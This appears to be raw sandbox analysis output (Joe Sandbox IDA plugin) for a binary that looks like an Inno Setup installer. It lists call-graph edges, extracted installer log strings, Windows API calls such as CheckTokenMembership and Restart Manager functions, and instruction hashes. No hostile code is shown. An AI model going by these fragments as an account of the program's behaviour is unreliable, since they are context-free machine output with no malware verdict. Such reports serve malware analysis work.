53457 493f4c 53455->53457 53459 493ebc 53456->53459 53457->53444 53458->53452 53459->53458 53460 4037b8 4 API calls 53459->53460 53461 493edf 53460->53461 53462 403778 4 API calls 53461->53462 53463 493f10 53462->53463 53464 403634 4 API calls 53463->53464 53464->53449 53465->53443 53467 44894d 53466->53467 53468 448990 53466->53468 53469 403494 4 API calls 53467->53469 53471 4489a4 53468->53471 53478 448524 53468->53478 53470 448958 53469->53470 53475 4037b8 4 API calls 53470->53475 53473 403400 4 API calls 53471->53473 53474 4489d7 53473->53474 53474->53458 53476 448974 53475->53476 53477 4037b8 4 API calls 53476->53477 53477->53468 53479 403494 4 API calls 53478->53479 53480 44855a 53479->53480 53481 4037b8 4 API calls 53480->53481 53482 44856c 53481->53482 53483 403778 4 API calls 53482->53483 53484 44858d 53483->53484 53485 4037b8 4 API calls 53484->53485 53486 4485a5 53485->53486 53487 403778 4 API calls 53486->53487 53488 4485d0 53487->53488 53489 4037b8 4 API calls 53488->53489 53500 4485e8 53489->53500 53490 448620 53492 403420 4 API calls 53490->53492 53491 4486bb 53494 4486c3 GetProcAddress 53491->53494 53495 448700 53492->53495 53493 448655 LoadLibraryA 53493->53500 53497 4486d6 53494->53497 53495->53471 53496 448643 LoadLibraryExA 53496->53500 53497->53490 53498 403b80 4 API calls 53498->53500 53499 403450 4 API calls 53499->53500 53500->53490 53500->53491 53500->53493 53500->53496 53500->53498 53500->53499 53502 43da80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53500->53502 53502->53500 53503 40ce1c 53506 406f00 WriteFile 53503->53506 53507 406f1d 53506->53507 53508 4222dc 53509 4222eb 53508->53509 53514 42126c 53509->53514 53512 42230b 53515 4212db 53514->53515 53529 42127b 53514->53529 53518 4212ec 53515->53518 53539 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53515->53539 53517 42131a 53521 42138d 53517->53521 53526 421335 53517->53526 53518->53517 53520 4213b2 53518->53520 53519 42138b 53522 4213de 53519->53522 53541 421e24 11 API 
calls 53519->53541 53520->53519 53524 4213c6 SetMenu 53520->53524 53521->53519 53528 4213a1 53521->53528 53542 4211b4 10 API calls 53522->53542 53524->53519 53526->53519 53532 421358 GetMenu 53526->53532 53527 4213e5 53527->53512 53537 4221e0 10 API calls 53527->53537 53531 4213aa SetMenu 53528->53531 53529->53515 53538 408d1c 19 API calls 53529->53538 53531->53519 53533 421362 53532->53533 53534 42137b 53532->53534 53536 421375 SetMenu 53533->53536 53540 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53534->53540 53536->53534 53537->53512 53538->53529 53539->53518 53540->53519 53541->53522 53542->53527 53543 40d064 53544 40d06c 53543->53544 53545 40d096 53544->53545 53546 40d09a 53544->53546 53547 40d08f 53544->53547 53549 40d0b0 53546->53549 53550 40d09e 53546->53550 53556 406288 GlobalHandle GlobalUnlock GlobalFree 53547->53556 53557 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 53549->53557 53555 40625c GlobalAlloc GlobalLock 53550->53555 53553 40d0ac 53553->53545 53554 408cac 5 API calls 53553->53554 53554->53545 53555->53553 53556->53545 53557->53553 53558 44b4a0 53559 44b4ae 53558->53559 53561 44b4cd 53558->53561 53559->53561 53562 44b384 53559->53562 53563 44b3b7 53562->53563 53573 414ae0 53563->53573 53565 44b3ca 53566 44b3f7 73A1A570 53565->53566 53567 40357c 4 API calls 53565->53567 53568 41a1e0 5 API calls 53566->53568 53567->53566 53569 44b417 SelectObject 53568->53569 53570 44b428 53569->53570 53577 44b0b8 53570->53577 53572 44b43c 73A1A480 53572->53561 53574 414aee 53573->53574 53575 4034e0 4 API calls 53574->53575 53576 414afb 53575->53576 53576->53565 53578 44b0cf 53577->53578 53579 44b162 53578->53579 53580 44b0e2 53578->53580 53581 44b14b 53578->53581 53579->53572 53580->53579 53583 402648 4 API calls 53580->53583 53582 44b15b DrawTextA 53581->53582 53582->53579 53584 44b0f3 53583->53584 53585 44b111 MultiByteToWideChar DrawTextW 53584->53585 53586 402660 4 API calls 53585->53586 53587 44b143 53586->53587 53587->53572 53588 
448720 53589 448755 53588->53589 53590 44874e 53588->53590 53591 448769 53589->53591 53592 448524 7 API calls 53589->53592 53594 403400 4 API calls 53590->53594 53591->53590 53593 403494 4 API calls 53591->53593 53592->53591 53596 448782 53593->53596 53595 4488ff 53594->53595 53597 4037b8 4 API calls 53596->53597 53598 44879e 53597->53598 53599 4037b8 4 API calls 53598->53599 53600 4487ba 53599->53600 53600->53590 53601 4487ce 53600->53601 53602 4037b8 4 API calls 53601->53602 53603 4487e8 53602->53603 53604 431bc8 4 API calls 53603->53604 53605 44880a 53604->53605 53606 431c98 4 API calls 53605->53606 53613 44882a 53605->53613 53606->53605 53607 448880 53620 44232c 53607->53620 53608 448868 53608->53607 53632 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53608->53632 53612 4488b4 GetLastError 53633 4484b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53612->53633 53613->53608 53631 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53613->53631 53615 4488c3 53634 443608 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53615->53634 53617 4488d8 53635 443618 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53617->53635 53619 4488e0 53621 442365 53620->53621 53622 44330a 53620->53622 53623 403400 4 API calls 53621->53623 53624 403400 4 API calls 53622->53624 53625 44236d 53623->53625 53626 44331f 53624->53626 53627 431bc8 4 API calls 53625->53627 53626->53612 53629 442379 53627->53629 53628 4432fa 53628->53612 53629->53628 53636 441a04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53629->53636 53631->53613 53632->53607 53633->53615 53634->53617 53635->53619 53636->53629 53637 4165e4 73A25CF0 53638 42e3e7 SetErrorMode 53639 40cee8 53640 40cef5 53639->53640 53641 40cefa 53639->53641 53643 406f38 CloseHandle 53640->53643 53643->53641 53644 47ff68 53649 450fd8 53644->53649 53646 47ff7c 53659 47f054 53646->53659 53648 47ffa0 53650 450fe5 53649->53650 53652 451039 53650->53652 53668 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53650->53668 53665 450e5c 
                                                          Strings
                                                          • Version of our file: (none), xrefs: 0047091C
                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                          • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                          • Will register the file (a type library) later., xrefs: 00471319
                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                          • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                          • .tmp, xrefs: 00470DD7
                                                          • Failed to strip read-only attribute., xrefs: 00470CF3
                                                          • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                          • Non-default bitness: 64-bit, xrefs: 004706CF
                                                          • -- File entry --, xrefs: 0047051B
                                                          • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                          • Same time stamp. Skipping., xrefs: 00470B75
                                                          • Version of existing file: (none), xrefs: 00470B1A
                                                          • @, xrefs: 004705D0
                                                          • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                          • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                          • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                          • InUn, xrefs: 00470F65
                                                          • Non-default bitness: 32-bit, xrefs: 004706DB
                                                          • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                          • Time stamp of our file: %s, xrefs: 004707BB
                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                          • Stripped read-only attribute., xrefs: 00470CE7
                                                          • Dest filename: %s, xrefs: 004706B4
                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                          • p%G, xrefs: 0047151A
                                                          • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                          • Dest file exists., xrefs: 004707DB
                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                          • Time stamp of existing file: %s, xrefs: 0047084B
                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                          • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                          • Same version. Skipping., xrefs: 00470B05
                                                          • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                          • Installing the file., xrefs: 00470D29
                                                          • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                          • API String ID: 0-1519224904
                                                          • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                          • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                          • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                          • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59

                                                          Control-flow Graph

                                                          control_flow_graph 1546 42e094-42e0a5 1547 42e0b0-42e0d5 AllocateAndInitializeSid 1546->1547 1548 42e0a7-42e0ab 1546->1548 1549 42e27f-42e287 1547->1549 1550 42e0db-42e0f8 GetVersion 1547->1550 1548->1549 1551 42e111-42e113 1550->1551 1552 42e0fa-42e10f GetModuleHandleA GetProcAddress 1550->1552 1553 42e115-42e123 CheckTokenMembership 1551->1553 1554 42e13a-42e154 GetCurrentThread OpenThreadToken 1551->1554 1552->1551 1555 42e261-42e277 FreeSid 1553->1555 1556 42e129-42e135 1553->1556 1557 42e156-42e160 GetLastError 1554->1557 1558 42e18b-42e1b3 GetTokenInformation 1554->1558 1556->1555 1561 42e162-42e167 call 4031bc 1557->1561 1562 42e16c-42e17f GetCurrentProcess OpenProcessToken 1557->1562 1559 42e1b5-42e1bd GetLastError 1558->1559 1560 42e1ce-42e1f2 call 402648 GetTokenInformation 1558->1560 1559->1560 1563 42e1bf-42e1c9 call 4031bc * 2 1559->1563 1572 42e200-42e208 1560->1572 1573 42e1f4-42e1fe call 4031bc * 2 1560->1573 1561->1549 1562->1558 1566 42e181-42e186 call 4031bc 1562->1566 1563->1549 1566->1549 1575 42e20a-42e20b 1572->1575 1576 42e23b-42e259 call 402660 CloseHandle 1572->1576 1573->1549 1579 42e20d-42e220 EqualSid 1575->1579 1583 42e222-42e22f 1579->1583 1584 42e237-42e239 1579->1584 1583->1584 1587 42e231-42e235 1583->1587 1584->1576 1584->1579 1587->1576
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                          • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                          • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 2252812187-1888249752
                                                          • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                          • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                          • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                          • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79

                                                          Control-flow Graph

                                                          control_flow_graph 1610 450294-4502a1 1611 4502a7-4502b4 GetVersion 1610->1611 1612 450350-45035a 1610->1612 1611->1612 1613 4502ba-4502d0 LoadLibraryA 1611->1613 1613->1612 1614 4502d2-45034b GetProcAddress * 6 1613->1614 1614->1612
                                                          APIs
                                                          • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                          • GetProcAddress.KERNEL32(6E350000,RmStartSession), ref: 004502DD
                                                          • GetProcAddress.KERNEL32(6E350000,RmRegisterResources), ref: 004502F2
                                                          • GetProcAddress.KERNEL32(6E350000,RmGetList), ref: 00450307
                                                          • GetProcAddress.KERNEL32(6E350000,RmShutdown), ref: 0045031C
                                                          • GetProcAddress.KERNEL32(6E350000,RmRestart), ref: 00450331
                                                          • GetProcAddress.KERNEL32(6E350000,RmEndSession), ref: 00450346
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadVersion
                                                          • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                          • API String ID: 1968650500-3419246398
                                                          • Opcode ID: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                          • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                          • Opcode Fuzzy Hash: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                          • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C

                                                          Control-flow Graph

                                                          control_flow_graph 1674 423c04-423c38 1675 423c3a-423c3b 1674->1675 1676 423c6c-423c83 call 423b60 1674->1676 1678 423c3d-423c59 call 40b434 1675->1678 1681 423ce4-423ce9 1676->1681 1682 423c85 1676->1682 1711 423c5b-423c63 1678->1711 1712 423c68-423c6a 1678->1712 1684 423ceb 1681->1684 1685 423d1f-423d24 1681->1685 1686 423c8b-423c8e 1682->1686 1687 423d48-423d58 1682->1687 1688 423cf1-423cf9 1684->1688 1689 423fa9-423fb1 1684->1689 1692 424092-4240a0 IsIconic 1685->1692 1693 423d2a-423d2d 1685->1693 1690 423c90 1686->1690 1691 423cbd-423cc0 1686->1691 1694 423d63-423d6b call 42418c 1687->1694 1695 423d5a-423d5f 1687->1695 1698 423f0b-423f32 SendMessageA 1688->1698 1699 423cff-423d04 1688->1699 1701 42414a-424152 1689->1701 1706 423fb7-423fc2 call 4181d8 1689->1706 1702 423c96-423c99 1690->1702 1703 423dee-423dfe call 423b7c 1690->1703 1707 423da1-423da8 1691->1707 1708 423cc6-423cc7 1691->1708 1700 4240a6-4240b1 GetFocus 1692->1700 1692->1701 1704 423d33-423d34 1693->1704 1705 4240ce-4240e3 call 424848 1693->1705 1694->1701 1709 423d70-423d78 call 4241d4 1695->1709 1710 423d61-423d84 call 423b7c 1695->1710 1698->1701 1713 424042-42404d 1699->1713 1714 423d0a-423d0b 1699->1714 1700->1701 1722 4240b7-4240c0 call 41efec 1700->1722 1715 424169-42416f 1701->1715 1723 423e16-423e32 PostMessageA call 423b7c 1702->1723 1724 423c9f-423ca2 1702->1724 1703->1701 1717 4240e5-4240ec 1704->1717 1718 423d3a-423d3d 1704->1718 1705->1701 1706->1701 1767 423fc8-423fd7 call 4181d8 IsWindowEnabled 1706->1767 1707->1701 1727 423dae-423db5 1707->1727 1728 423f37-423f3e 1708->1728 1729 423ccd-423cd0 1708->1729 1709->1701 1710->1701 1711->1715 1712->1676 1712->1678 1713->1701 1733 424053-424065 1713->1733 1730 423d11-423d14 1714->1730 1731 42406a-424075 1714->1731 1744 424103-424116 call 424524 1717->1744 1745 4240ee-424101 call 4244cc 1717->1745 1734 423d43 1718->1734 1735 424118-42411f 1718->1735 1722->1701 1782 4240c6-4240cc SetFocus 1722->1782 1723->1701 1741 423ca8-423cab 1724->1741 1742 423e9d-423ea4 1724->1742 1727->1701 1747 423dbb-423dc1 1727->1747 1728->1701 1737 423f44-423f49 call 404e54 1728->1737 1748 423cd6-423cd9 1729->1748 1749 423e37-423e57 call 423b7c 1729->1749 1753 423d1a 1730->1753 1754 423f4e-423f56 1730->1754 1731->1701 1756 42407b-42408d 1731->1756 1733->1701 1755 424143-424144 call 423b7c 1734->1755 1751 424132-424141 1735->1751 1752 424121-424130 1735->1752 1737->1701 1762 423cb1-423cb2 1741->1762 1763 423dc6-423dd4 IsIconic 1741->1763 1764 423ea6-423eb9 call 423b0c 1742->1764 1765 423ed7-423ee8 call 423b7c 1742->1765 1744->1701 1745->1701 1747->1701 1768 423e03-423e11 call 424170 1748->1768 1769 423cdf 1748->1769 1795 423e7b-423e98 call 423a7c PostMessageA 1749->1795 1796 423e59-423e76 call 423b0c PostMessageA 1749->1796 1751->1701 1752->1701 1753->1755 1754->1701 1780 423f5c-423f63 1754->1780 1791 424149 1755->1791 1756->1701 1783 423cb8 1762->1783 1784 423d89-423d91 1762->1784 1773 423de2-423de9 call 423b7c 1763->1773 1774 423dd6-423ddd call 423bb8 1763->1774 1808 423ecb-423ed2 call 423b7c 1764->1808 1809 423ebb-423ec5 call 41ef50 1764->1809 1802 423eea-423ef0 call 41ee9c 1765->1802 1803 423efe-423f06 call 423a7c 1765->1803 1767->1701 1799 423fdd-423fec call 4181d8 IsWindowVisible 1767->1799 1768->1701 1769->1755 1773->1701 1774->1701 1780->1701 1794 423f69-423f78 call 4181d8 IsWindowEnabled 1780->1794 1782->1701 1783->1755 1784->1701 1797 423d97-423d9c call 422c44 1784->1797 1791->1701 1794->1701 1824 423f7e-423f94 call 412308 1794->1824 1795->1701 1796->1701 1797->1701 1799->1701 1825 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 1799->1825 1822 423ef5-423ef8 1802->1822 1803->1701 1808->1701 1809->1808 1822->1803 1824->1701 1830 423f9a-423fa4 1824->1830 1825->1701 1830->1701
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50d408d7c884e6e1e9eef83812aacce54c36a632f8e4c3c09f50c6ce0f1de6a1
                                                          • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                          • Opcode Fuzzy Hash: 50d408d7c884e6e1e9eef83812aacce54c36a632f8e4c3c09f50c6ce0f1de6a1
                                                          • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09

                                                          Control-flow Graph

                                                          control_flow_graph 2185 4671cc-4671e2 2186 4671e4-4671e7 call 402d30 2185->2186 2187 4671ec-4672a3 call 494c88 call 402b30 * 6 2185->2187 2186->2187 2204 4672a5-4672cc call 414634 2187->2204 2205 4672e0-4672f9 2187->2205 2209 4672d1-4672db call 4145f4 2204->2209 2210 4672ce 2204->2210 2211 467336-467344 call 494f90 2205->2211 2212 4672fb-467322 call 414614 2205->2212 2209->2205 2210->2209 2220 467346-467355 call 494dd8 2211->2220 2221 467357-467359 call 494efc 2211->2221 2218 467327-467331 call 4145d4 2212->2218 2219 467324 2212->2219 2218->2211 2219->2218 2226 46735e-4673b1 call 4948ec call 41a3c8 * 2 2220->2226 2221->2226 2233 4673c2-4673d7 call 45142c call 414b10 2226->2233 2234 4673b3-4673c0 call 414b10 2226->2234 2240 4673dc-4673e3 2233->2240 2234->2240 2241 4673e5-467426 call 4146b4 call 4146f8 call 420f90 call 420fbc call 420b60 call 420b8c 2240->2241 2242 46742b-4678b1 call 494d28 call 49504c call 414614 * 3 call 4146b4 call 4145d4 * 3 call 460a24 call 460a3c call 460a48 call 460a90 call 460a24 call 460a3c call 460a48 call 460a90 call 460a3c call 460a90 LoadBitmapA call 41d6a8 call 460a60 call 460a78 call 466fa8 call 468abc call 466628 call 40357c call 414b10 call 466960 call 466968 call 466628 call 40357c * 2 call 414b10 call 468abc call 466628 call 414b10 call 466960 call 466968 call 414b10 * 2 call 468abc call 414b10 * 2 call 466960 call 4145f4 call 466960 call 4145f4 call 468abc call 414b10 call 466960 call 466968 call 468abc call 414b10 call 466960 call 4145f4 * 2 call 414b10 call 466960 call 4145f4 2240->2242 2241->2242 2372 4678b3-46790b call 4145f4 call 414b10 call 466960 call 4145f4 2242->2372 2373 46790d-467926 call 414a3c * 2 2242->2373 2380 46792b-4679dc call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2372->2380 2373->2380 2399 467a16-467c4c call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 4181d8 call 42ed30 call 414b10 call 494d28 call 49504c call 414614 call 466628 call 414b10 call 466960 call 4145f4 call 466628 call 468abc call 466628 call 414b10 call 466960 call 4145f4 call 466968 call 466628 call 414b10 call 466960 2380->2399 2400 4679de-4679f9 2380->2400 2461 467c4e-467c57 2399->2461 2462 467c8d-467d46 call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2399->2462 2401 4679fe-467a11 call 4145f4 2400->2401 2402 4679fb 2400->2402 2401->2399 2402->2401 2461->2462 2463 467c59-467c88 call 414a3c call 466968 2461->2463 2480 467d80-4681a1 call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 414b10 call 494d28 call 49504c call 414614 call 414b10 call 466628 call 468abc call 466628 call 414b10 call 466960 call 466968 call 42bbc8 call 49505c call 44e8a8 call 466628 call 468abc call 466628 call 468abc call 466628 call 468abc * 2 call 414b10 call 466960 call 466968 call 468abc call 4948ec call 41a3c8 call 466628 call 40357c call 414b10 call 466960 call 4145f4 call 414b10 * 2 call 49505c call 403494 call 40357c * 2 call 414b10 2462->2480 2481 467d48-467d63 2462->2481 2463->2462 2580 4681c5-4681cc 2480->2580 2581 4681a3-4681c0 call 44ffb0 call 45010c 2480->2581 2482 467d65 2481->2482 2483 467d68-467d7b call 4145f4 2481->2483 2482->2483 2483->2480 2583 4681f0-4681f7 2580->2583 2584 4681ce-4681eb call 44ffb0 call 45010c 2580->2584 2581->2580 2586 46821b-468261 call 4181d8 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468bb0 2583->2586 2587 4681f9-468216 call 44ffb0 call 45010c 2583->2587 2584->2583 2601 468263-46826a 2586->2601 2602 46827b 2586->2602 2587->2586 2603 468277-468279 2601->2603 2604 46826c-468275 2601->2604 2605 46827d-46828c 2602->2605 2603->2605 2604->2602 2604->2603 2606 4682a6 2605->2606 2607 46828e-468295 2605->2607 2610 4682a8-4682c2 2606->2610 2608 468297-4682a0 2607->2608 2609 4682a2-4682a4 2607->2609 2608->2606 2608->2609 2609->2610 2611 46836b-468372 2610->2611 2612 4682c8-4682d1 2610->2612 2615 468405-468413 call 414b10 2611->2615 2616 468378-46839b call 47bb50 call 403450 2611->2616 2613 4682d3-46832a call 47bb50 call 414b10 call 47bb50 call 414b10 call 47bb50 call 414b10 2612->2613 2614 46832c-468366 call 414b10 * 3 2612->2614 2613->2611 2614->2611 2622 468418-468421 2615->2622 2635 4683ac-4683c0 call 403494 2616->2635 2636 46839d-4683aa call 47bcf0 2616->2636 2626 468427-46843f call 429fd0 2622->2626 2627 468531-468560 call 42b964 call 44e834 2622->2627 2644 4684b6-4684ba 2626->2644 2645 468441-468445 2626->2645 2661 468566-46856a 2627->2661 2662 46860e-468612 2627->2662 2657 4683d2-468403 call 42c7fc call 42cbb8 call 403494 call 414b10 2635->2657 2658 4683c2-4683cd call 403494 2635->2658 2636->2657 2650 4684bc-4684c5 2644->2650 2651 46850a-46850e 2644->2651 2652 468447-468481 call 40b434 call 47bb50 2645->2652 2650->2651 2659 4684c7-4684d2 2650->2659 2655 468522-46852c call 42a054 2651->2655 2656 468510-468520 call 42a054 2651->2656 2712 468483-46848a 2652->2712 2713 4684b0-4684b4 2652->2713 2655->2627 2656->2627 2657->2622 2658->2657 2659->2651 2671 4684d4-4684d8 2659->2671 2663 46856c-46857e call 40b434 2661->2663 2664 468614-46861b 2662->2664 2665 468691-468695 2662->2665 2691 4685b0-4685e7 call 47bb50 call 44cb04 2663->2691 2692 468580-4685ae call 47bb50 call 44cbd4 2663->2692 2664->2665 2674 46861d-468624 2664->2674 2675 468697-4686ae call 40b434 2665->2675 2676 4686fe-468707 2665->2676 2680 4684da-4684fd call 40b434 call 406ab4 2671->2680 2674->2665 2685 468626-468631 2674->2685 2706 4686b0-4686ec call 40b434 call 469824 * 2 call 4696c4 2675->2706 2707 4686ee-4686fc call 469824 2675->2707 2683 468726-46873b call 466d08 call 466a84 2676->2683 2684 468709-468721 call 40b434 call 469824 2676->2684 2723 468504-468508 2680->2723 2724 4684ff-468502 2680->2724 2737 46878d-468797 call 414a3c 2683->2737 2738 46873d-468760 call 42a038 call 40b434 2683->2738 2684->2683 2685->2683 2694 468637-46863b 2685->2694 2739 4685ec-4685f0 2691->2739 2692->2739 2705 46863d-468653 call 40b434 2694->2705 2734 468686-46868a 2705->2734 2735 468655-468681 call 42a054 call 469824 call 4696c4 2705->2735 2706->2683 2707->2683 2712->2713 2725 46848c-46849e 